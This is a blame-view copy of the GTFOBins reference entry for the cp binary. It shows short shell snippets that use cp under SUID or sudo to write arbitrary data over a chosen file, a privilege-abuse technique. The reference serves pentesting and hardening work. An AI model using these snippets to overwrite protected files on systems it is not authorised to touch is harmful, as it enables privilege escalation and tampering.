GTFOBins.github.io/_gtfobins/cp.md

17 lines
407 B
Markdown
Raw Normal View History

2018-09-03 20:33:24 +00:00
---
2018-09-03 20:40:09 +00:00
description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
2018-09-03 20:33:24 +00:00
functions:
suid-enabled:
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
./cp $TF $LFILE
sudo-enabled:
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
sudo cp $TF $LFILE
---